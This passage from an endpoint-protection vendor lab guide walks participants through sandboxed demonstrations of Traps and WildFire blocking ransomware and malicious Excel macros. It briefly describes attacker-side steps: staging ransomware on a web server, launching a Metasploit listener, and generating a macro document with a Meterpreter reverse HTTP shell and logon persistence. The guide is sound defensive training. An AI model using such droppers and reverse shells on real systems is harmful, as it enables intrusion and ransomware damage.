of all executable files that have been run on the endpoints connected to the ESM Server, along with their
respective verdicts.
Notice “happy.exe” among the first few entries in this table, along with its (new) hash and a verdict of malware
(indicated by the red “X”) obtained via Local Analysis (another name for Static Analysis).
The ESM upload of this malware to WildFire should have been completed at this point, as indicated by the
icon under the “Upload Status” column in the table. Note, if you have worked through the tasks quickly, the
verdict may not be available. Please recheck after a couple of minutes.
In the Hash Control table, click the record that corresponds to the (modified) “happy.exe.” This will display an
expanded information area.
Use the right-arrow key on your keyboard to scroll right in the table to display the “WildFire Report” button in
this expanded information area.
Click the “WildFire Report” button to download the report.
UTD-AEP 2.2 56
Ultimate Test Drive - Advanced Endpoint Protection
Chrome will download the report and display a download bar on the bottom of the browser window.
Click the button on the download bar that corresponds to the file you just download. This will open the PDF file
in a separate browser tab.
Review the WildFire report to learn more about the types of information WildFire reveals through its full
analysis of the ransomware file.
The threat intelligence gained through the WildFire analysis will have automatically reprogrammed the Next-
Generation Firewall in the UTD environment to prevent access to the malware file.
For this step, we will use the web server that is located on the Attacker system. The Attacker system is
equipped with a separate network interface that is routed through the Next-Generation Firewall, so the firewall
UTD-AEP 2.2 57
Ultimate Test Drive - Advanced Endpoint Protection
will evaluate and secure any requests directed to the web server through this interface.
Click the “Attacker” tab to display that desktop environment.
Next, click inside either of the terminal windows that are currently open on the Attacker desktop system, and
type the following command to transfer “happy.exe” to the root directory of the web server:
cp happy.exe /var/www/ngfw/
In the list of files from the web server that are displayed in the browser, click the name of our ransomware file,
“happy.exe.”
The browser should now display a message stating that “Virus/Spyware Download Blocked” and identify the
file that you attempted to download, “happy.exe.”
This verifies that when Traps encountered an unknown malware (the modified ransomware) and submitted it
to WildFire for analysis, the threat intelligence gained from that analysis automatically reprogrammed the
Next-Generation Firewall in the UTD environment to block the transfer of the file through the firewall.
Close Internet Explorer by clicking the “X” on the top-right corner of that window. If Outlook is still open, close
it as well.
End of Activity 7
UTD-AEP 2.2 58
Ultimate Test Drive - Advanced Endpoint Protection
From the “Shortcut Menu” at the top of the browser, click “VM List”. This page will show all the available VMs.
UTD-AEP 2.2 59
Ultimate Test Drive - Advanced Endpoint Protection
Click “Revert VM” to start the revert process. This should take 5-10 minutes.
UTD-AEP 2.2 60
Ultimate Test Drive - Advanced Endpoint Protection
It may take up to 5 minutes for the effects of the attack to become noticeable. Once the Gryphon ransomware
has finished encrypting files, it will launch Notepad with the ransom note.
Notice that even the folder on the desktop has been encrypted. All files encrypted will have the extension
“[chines34@protonmail.ch].gryphon”.
UTD-AEP 2.2 61
Ultimate Test Drive - Advanced Endpoint Protection
The default Traps policy will stop the ransomware before any files are encrypted.
Click “Show Details” to see that the “Anti-Ransomware Protection” module was activated.
Click the “Events” tab in the Traps console window. This shows that the Anti-Ransomware Protection module
caught the process “OnlineGames.exe” and terminated it.
UTD-AEP 2.2 62
Ultimate Test Drive - Advanced Endpoint Protection
Notice that a WildFire report is already available. As this file is already known to WildFire and would have
been stopped immediately as known malware. We had previously disabled WildFire so you could see the
multi-layer capabilities that can detect and prevent ransomware launched using malicious executable files.
End of Activity 8
UTD-AEP 2.2 63
Ultimate Test Drive - Advanced Endpoint Protection
UTD-AEP 2.2 64
Ultimate Test Drive - Advanced Endpoint Protection
In the terminal window, type the following command at the prompt and press the “enter/return” key:
./macro.sh
This will load Metasploit and configure it to listen for incoming HTTP connections from the victim system.
When Metasploit has completed loading, it should display the following prompt
“msf exploit(handler) >”
The attacker system is now ready and online, waiting for a connection from the victim system.
UTD-AEP 2.2 65
Ultimate Test Drive - Advanced Endpoint Protection
Next, right click the icon and select Run with PowerShell.
Enter a document name of your choosing.
Enter “1” for Meterpreter Shell with Logon Persistence.
Enter “2” for Meterpreter Reverse HTTP.
Once complete, the PowerShell window will close. There will be a new Excel file on the desktop with the
document name you provided.
In the ESM Server console, click the “Policies” tab. This will display the Application Protection Modules (by
default).
In the left navigation area, click the “WildFire” link under the “Malware” heading.
Click the “WildFire for Office files: Off” policy.
Click the “Edit” button to modify this policy. This will display the WildFire policy editor window, with the
“Settings” tab visible. From the “Activation” drop-down, select the “On” option. This will enable WildFire and
Static Analysis features of Traps for Office files.
UTD-AEP 2.2 66
Ultimate Test Drive - Advanced Endpoint Protection
Next, click the “Name” tab in the same editor window to display the name that is assigned to this policy
(“WildFire for Office files: Off”).
Change the name of the policy to “WildFire for Office files: On” in the text box labeled and click the “Apply”
button to save your changes.
This will return you to the list of WildFire policies currently configured on the ESM.
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop.
Next, click the “Check In Now” link on the bottom of the Traps console window to retrieve from the ESM
Server the changes in the WildFire policy that you just enacted in the previous Task.
Click the “Policy” tab in the Traps client console. Verify that the “WildFire for Office files: On” policy that you
created in the previous Task is now displayed among the policies in effect on this Traps client.
UTD-AEP 2.2 67
Ultimate Test Drive - Advanced Endpoint Protection
Find the Excel file that you previously generated in Task 3, Step 2 and double-click it to open the document.
This will launch Excel and attempt to open the document. Traps should stop the file from opening and display
a prevention dialog box informing you that Traps has blocked a malicious activity.
Click the “Show Details” button to see that this previously-unknown macro was stopped by Local Analysis.
UTD-AEP 2.2 68
Ultimate Test Drive - Advanced Endpoint Protection
Click the “Events” tab in the Traps console window. This shows that Local Analysis caught the macro running
in the process “excel.exe” and terminated it.
Next, click the “Hash Control” button to directly access the admin override policy associated with the Excel file
that you tried to open.
Click on the entry to open it and view additional details.
UTD-AEP 2.2 69
Ultimate Test Drive - Advanced Endpoint Protection
Click “Show Details” to see that this previously known macro was stopped by WildFire.
UTD-AEP 2.2 70
Ultimate Test Drive - Advanced Endpoint Protection
Click the “Events” tab in the Traps console window. This shows that WildFire prevented the macro running in
the process “excel.exe” and terminated it.
UTD-AEP 2.2 71
Ultimate Test Drive - Advanced Endpoint Protection
Click the “Traps Client” tab to display that desktop. This should return you to the Traps Client desktop.
Next, click the “Check In Now” link on the bottom of the Traps console window to retrieve from the ESM
Server the changes in the WildFire policy that you just enacted in the previous Task.
Click the “Policy” tab in the Traps client console. Verify that the “WildFire for Office files: Off” policy that you
created in the previous Step is now displayed among the policies in effect on this Traps client.
UTD-AEP 2.2 72
Ultimate Test Drive - Advanced Endpoint Protection
Find the Excel file named “FinancialReport” on the desktop and double-click it to open the file.
Excel will open to a blank spreadsheet. When prompted, click “Enable Content”
Traps will stop the macro from running due to a “Suspicious process creation detected”
Click “Show details” and scroll down to see that the macro attempted to launch the child process “wscript.exe.”
The Child Process Protection component of Traps stopped its execution.
Click the “Events” tab in the Traps console window. This shows that Child Process Protection prevented the
macro from running in the process ”excel.exe” and terminated it.
UTD-AEP 2.2 73
Ultimate Test Drive - Advanced Endpoint Protection
Notice that no active connections have been established. Traps has prevented both known and unknown
malicious macros from compromising our endpoint.
End of Activity 9
UTD-AEP 2.2 74
Ultimate Test Drive - Advanced Endpoint Protection
Thank you for attending the Ultimate Test Drive event. We hope that you found the presentation and lab
activities enjoyable and informative.
In this Activity, we ask that you complete a short evaluation/survey to share your thoughts about this UTD.
We need and appreciate your guidance and advice.
In your browser, click the “Survey” tab among the list of the available desktop environments for the UTD.
Follow the on-screen instructions to complete the survey and submit your results.
End of Activity 10
UTD-AEP 2.2 75
Ultimate Test Drive - Advanced Endpoint Protection
If the firewall is not connected to the Internet, you can enable the firewall to allow internet connectivity.
In your browser, click the “Traps Client” link on the Shortcut Menu that lists the available desktop
environments in the UTD. This will connect you to the “Traps Client” through your browser.
This logs you in to the firewall and displays the main dashboard.
UTD-AEP 2.2 76
Ultimate Test Drive - Advanced Endpoint Protection
Click the “Network” tab, then click the “Interfaces” node on the left-hand side. This will display all the interfaces
configured for the firewall.
Click the interface “ethernet1/1” under the “Ethernet” tab. This will display the configuration dialog box.
Click the “Advanced” tab and select “up” in the “Link State” drop-down to the right of the dialog box; then click
“OK” to return to the network interface listing.
UTD-AEP 2.2 77
Ultimate Test Drive - Advanced Endpoint Protection
This will display a confirmation pop-up. Click “Commit” in the pop-up window to confirm your choice. This will
display the Commit Status dialog box containing a progress bar.
Once the process has completed, click “Close” in the pop-up window to return to the network interface listing.
The “Link Status” of “ethernet1/1” has turned green now that the interface is up.
Open a new tab in the browser window and confirm Internet connectivity by visiting http://www.google.com.
(Note that only google-base application is enabled in the firewall policy, other web sites will be blocked.)
Once you have verified internet connectivity, close the browser by clicking the “X” in the top-right corner of the
browser’s application window.
UTD-AEP 2.2 78
Ultimate Test Drive - Advanced Endpoint Protection
This appendix provides instructions to access the Attacker (Kali Linux) VM. If the GUI is slow using the default
console access, this is the alternative access method.
You will automatically be logged into a SSH session instead of the GUI.
Since the SSH session is a single shell window, you will need to perform the following steps once you reach
UTD-AEP 2.2 79
Ultimate Test Drive - Advanced Endpoint Protection
Continue with Activity 6, Task 3. When done, type “fg” to return Metasploit/Meterpreter to the foreground.
UTD-AEP 2.2 80